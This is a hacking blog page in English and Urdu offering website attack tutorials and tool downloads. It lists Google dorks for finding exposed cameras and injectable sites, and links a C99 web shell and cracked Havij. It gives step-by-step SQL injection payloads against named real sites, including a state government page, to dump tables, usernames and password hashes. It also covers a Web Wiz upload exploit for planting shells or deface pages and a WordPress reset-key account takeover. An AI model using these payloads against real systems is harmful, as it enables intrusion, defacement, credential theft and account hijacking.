Notice Board

PatTakhaZOne Web Serf Education Purpose keh lhya ha. Jasa keh ap janty hein keh Takreeban 100% ma sa 90% patches, Craking tools or Hacking software mein virus hota ha.PatTakhaZOne peh har ek tool check kiya gya oR Trusted ha :) Ma Kud ek ek sofware Ko check Krka upload krta hon. Umeed ha apko meri posts pasand ahy gi.(Every SOftware is 100% Secure and Trusted) All information on this Blog is for educational purposes only.

Showing posts with label Website Hacking. Show all posts
Showing posts with label Website Hacking. Show all posts

View Hidden Password in Browser

View Hidden Password  in Browser



Live Cameras Around The World



Go to Google and search any of the texts given below and peep through Live cameras around the world


  • inurl:”CgiStart?page=”
  • inurl:/view.shtml* intitle:”Live View / — AXIS
  • inurl:view/view.shtml
  • inurl:ViewerFrame?Mode=
  • inurl:ViewerFrame?Mode=Refresh
  • inurl:axis-cgi/jpg

You can Play Mp3 Movie Directly On Chrome

Do you Know you can play Mp3, Movie directly on Chrome Browser, Just drag files in Chrome Window


Check a website is safe

Check a website is safe to visit or Not by changing red letter by website domain name


http://www.google.com/safebrowsing/diagnostic?site=PattakhaZOne.blogspot.com



C99 Shell For Free Download

C99 Shell For Free Download





5000 Fresh Google Dorks List for SQL injection

Latest Google Dorks For Hacking We call them 'googledorks': Inept or foolish people as revealed by Google. Whatever you call these fools, you've found the center of the Google Hacking. I need to see if a site I am testing is vulnerable to any of the multiple Google dorks that are available at sites like this and this





Deface Page Creator v1

The BeSt One ** DEFACE PAGE CREATOR v1 **


CLICK HERE TO DOWNLOAD

WINRAR PASSWORD

Havij 1.16 Pro Cracked Portable With Video Tutorial


Havij 1.16 Pro Cracked Portable Full Download




Download SQL Poizon v1.1 - The Exploit Scanner Free Full

Download SQL Poizon v1.1 - The Exploit Scanner Free Full







SQL Poizon is a tool that is used to find and evaluate sql vulnerable websites.

Sql Poizon tool includes php , asp , rfi , lfi dorks and using this tools you can find vulnerable sites like sql vulnerable sites and you can also find vulnerable sites by country and you can hack sql vulnerable sites using Sql Poizon tool and you can also browse the sites using this tool.

Procedure for using SQL Poizon:

1)  First download SQL Poizon software from the download link below. 

2) Run Sql Poizon v1.1 

3) Once you run it, you have to select a dork. After you have selected the desired dork press Scan and it'll show the results in the Result Panel.

4) Now you have to send the results to the Sqli Crawler. You can do this by right clicking in the Results Panel and select "Send to Sqli Crawler -> All"

5) Now the Sqli Cralwer tab will open and all you have to do is click Crawl and it will check if the website is vulnerable to SQL Injection or not.

6) Now you have to press Export Results and place it somewhere where you can open it later for further exploitation.

Screenshot :



CLICK HERE TO DOWNLOAD



How to Find Vulnerable Website In Urdu

Ap ne Vulnerable site k bare me Para Hoga K wo Hack Ho jati Hian Q k Un site Ko sahi Tarikay se Update ya Define Nai Kia Jata Hy To IS K Liay Hum SQL Poizon Use Kren Ge Jo K me Ap ko Downlaod Krny Ko Don ga 


CLICK HERE TO DOWNLOAD 


Ab Ap ne Khona Hy Isy Or  Run Kren Ab Ap ne SQL DOrk Pe Click Krna Hy Or Yahan Ap ne PHp YA KOi B Dork Select Krna Hy Jese Me ne PHP Select Kri Hy ,Is K Bad AP Ne Koi B Dork URL Select Krna Hy Jese Me Ne Index.php Select Kri Hy



Ab 3rd Step Pe ap Ne Scan K Button Pe CLick Krna Hy Or Scan Start Ho JAie Ga Uese Me ne Kia . Watch Windows Pe AP KA YE AIe Ga Search Completed.
Url's Found: 64 ya 34 ya Kuch B


Ab ap Ne Nechy Result Panel Pe Koi Ake Website Pe Tick Krna Hy Or Us pe Right Click Krna Hy OR Send To SQLI Crawler

Or Phr All Pe click Krna Hy  AB Ap KA Crawl Panel Khul Jaie Ga 
Yahan AP ne Crawl Pe CLick Krna Hy To In Websites Ki Crawling Shuru Ho 


Jaie Gi Akhir Me Ye Result Aie ga Jo Website Vulnerable Hon gi Un Pe non-clear Ka Nishan Aie Ga ....Nechay Rable LInk Me Sab Vulnerbale Site Hain


Un kO Ap Asani Se Hack Kr Sakty Hian

HACK Websites Using THE Web Wiz Vulnerability



Today I'm going to tell you how to hack a website using VULNERABLITY called RTE Webwiz Vulnerability.
Webwiz rich text editor HTML code is carried in the open after they are sent charCode due functioning of the page .


STEPS:

1) Goto google and type in any of these dorks:
inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/
2) Open any site and replace everything after "http://site.com/" with the following exploit then press enter:
rte/RTE_popup_file_atch.asp
3) Now the site's url will look like "site.com/rte/RTE_popup_file_atch.asp "

4) Now you will be redirected here:


5) Now you can upload your shell or directly upload your deface page

6) Now when you click upload you will get the file URL in the "FILE URL" textbox...


Msacess Injection on Live site

Today Im gonna discuss MS Access Injection which is rare really n wiered too . Hardly some web still using it.

Introduction

MS Access is commonly thought of as the little brother of Database engines, and not a lot of material has been published about methods used for exploiting it during a penetration test.MS Jet is often mistakenly thought of as being another name for MS Access, when in fact it is a database engine that is shipped as part of the Windows OS. MS Jet was however the core database engine used by MS Access up to version 2007. Since version 2007, MS Access has included a separate updated engine known as Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL server or Oracle, it is still commonly used by smaller web sites that want quick and easy database storage.

Default Tables Used In Access

Note: Those table name having * infront of their name, means it can be use in query.

Access 97

  • MSysAccessObjects *
  • MSysACEs
  • MSysModules
  • MSysModules2 *
  • MSysObjects
  • MSysQueries
  • MSysRelationship


Access 2000

  • MSysAccessObjects *
  • MSysAccessXML *
  • MSysACEs
  • MSysObjects
  • MSysQueries
  • MSysRelationships



Access 2002-2003

  • MSysAccessStorage *
  • MSysAccessXML *
  • MSysACEs
  • MSysObjects
  • MSysQueries
  • MSysRelationships



Access 2007

  • MSysAccessStorage *
  • MSysACEs
  • MSysComplexColumns
  • MSysComplexType_Attachment
  • MSysComplexType_Decimal
  • MSysComplexType_GUID
  • MSysComplexType_IEEEDouble
  • MSysComplexType_IEEESingle
  • MSysComplexType_Long
  • MSysComplexType_Short
  • MSysComplexType_Text
  • MSysComplexType_UnsignedByte
  • MSysNavPaneGroupCategories *
  • MSysNavPaneGroups *
  • MSysNavPaneGroupToObjects *
  • MSysNavPaneObjectIDs *
  • SysObjects
  • MSysQueries
  • MSysRelationships



As we can see each version having some new default tables and each of them work differently .But ms access injection is real pain it does not contails schema , when we say schema that's mean we have to guess each table and column . Access also does not support.ERROR BASED INJECTION nor having global veriable like @@version . So we can guess the version by default table.

Column Enumeration and Union [b]

We will use the # for commenting the rest of the query instead of -- or /* .

[b]Step-1

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103

Above site is vuln to sql injection let's see what error we get ?

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103'

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
  [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'DISTRICTNUMBER = 103''.
   /h_reps/members.asp, line 16

Step-2

Using order by to get columns.

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 1# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 2# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 3# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 4# <== No error
we will do increament of 1 till we get an error :

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 35# <== Error

That's mean we have total number of columns are 34 . Let's proceed with union now.

If we are not sure about data type we can proceed with Null instead of integer .

Step-3

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34 from MSysAccessObjects#

We have used default table name of MS Access 2000 see the list above.
Now on your screen you can see some numbers right under the page contents like 17 19 20

Most common tables are below [/b]

  • users
  • admin
  • administrator
  • login
  • customers
  • user
  • members
  • member
  • customer


Step-4: Getting table

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34 from members#

Page load normaly that's mean we have found a valid table now let's enumerate columns .

Step-5 : Getting Columns

We will use GROUP BY and Having for example

GROUP BY tablename.column1 having 1=1#
GROUP BY tablename.coumn1,column2 having 1=1#
GROUP BY tablename.column1,column2,coumn(n).... having 1=1# 

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34 from members group by members.id#


Page will load with out any error now lets out it in place of number of column

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,id,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34 from members#


we have got the following data Smile . 
Code:
COMMITTEE ASSIGNMENTS
102

Now let's get next column

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,
  11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id,
  now having 1=1#


Page will load with out any error now lets out it in place of number of column

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,now,18,19,20,21,22,23,24,25,26,27,28,29,3​0,31,32,33,34 from members#


we have got the following data

Sql injection [Double Query Error Based]

Sql injection [Double Query Error Based]


This tutorial is about how to hack a website through Sql injection Double Query Error Based

So for this first you need a vulnerable site..

ok after getting a vulnerable site as a normal you get the column counts

suppose it has 4 columns so next your command will be

Code:
www.vulnsite.com/index.php?id=-12 union select 1,2,3,4--
but when you press enter it gives error :-0

the error is
Code:
(select statement have different numbers of column)

so now what????? Angry

don't be so confused its time for using double query Sql injection

so your command will look like this:-

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(version())+from+information_schema.tables+limit+0​,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

and result will look like this

Code:
"Duplicate entry '5.0.92-community-log1' for key 1"

so here '5.0.92-community-log1' is sites version.


now we have to find sites current_user so our command will be:-

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(current_user())+from+information_schema.tables+li​mit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)


result
Code:
"Duplicate entry user+1' for key 1"


ok now we will find tables by this command :-

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+limit+​0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

result should be
Code:
"duplicate entry 'table_name1' for key 1'

now keep increasing the limit you can find it near
Code:
((table_name)+from+information_schema.tables+limit+0,1) )
here change the limit '0,1'to 1,1 then 2,1 until you get the error.


ok now we will find tables which contains the data so our command will be:-

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+where+​table_schema=database()+limit+0,1),floor(Rand(0)*2))a+from+information_schema.ta​bles+group+by+a)b)

result
Code:
"duplicate entry tablename1' for key 1"

so here again increase the limits value until you get the table like user,,admin,,login etc etc.. Tongue

ok now suppose we have table name "user" so next step is to find columns of this table our command will be:-

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(column_name)+from+information_schema.columns+wher​e+table_name=<hex value of table>+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

result
Code:
"Duplicate entry 'column name1' for key 1'

you can change text to hex here>> http://www.swingnote.com/tools/texttohex.php

again keep changing limits value untill you get columns like username,password etc :/

ok now we have columns username and password we need the data inside the columns so our command will be:-

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(username,0x3a,password)+from+user+limit+0,1),floo​r(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

result
Code:
"Duplicate entry 'Admin:452875204827e1f25994a3da414587125' for key 1"
if the password is in hashes then you have to crack that hash
u can crack that hash with a site namely
Code:
http://md5decrypter.co.uk
so u can crack the hash
so u got user and pass login do wht u guyz want nd enjoy Big Grin 

POSTED BY PATTAKHA MUNDA

[Tutorial] Hack WordPress site with SQL injection

Hack WordPress site with SQL injection

As requested by few of you i decided to make this small tutorial on how to hack a wordpress site that has an SQLi in plugin.


So lets begin.

I will use this 0day here by AMY hacker.

First of all we need to find a vulnerable page.
We enter this in Google:

Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

When you found your site you need to find admin email and username.
I will be using this site for example


Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3



When i add ' text disappears so it is vulnerable.






NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject:



Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--



Now we have 2 users.





We pick one and copy his email.
Go to the login page of the site.
It is usually here:


Code:
http://www.site.com/wp-login.php

And press "Lost your password?" 




Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.




Now when you got:

"Check your e-mail for the confirmation link."

It means that reset key is successfully sent.
Now we need to get the activation key.

Go back to the syntax you used for extracting email and username and do this:



Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--




Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--






Voila!
Now we just need to reset it.



Go to:


Code:
wp-login.php?action=rp&key=resetkey&login=username

NOTE: Replace key= & login= 

So my link will be:




Login with new password and shell it.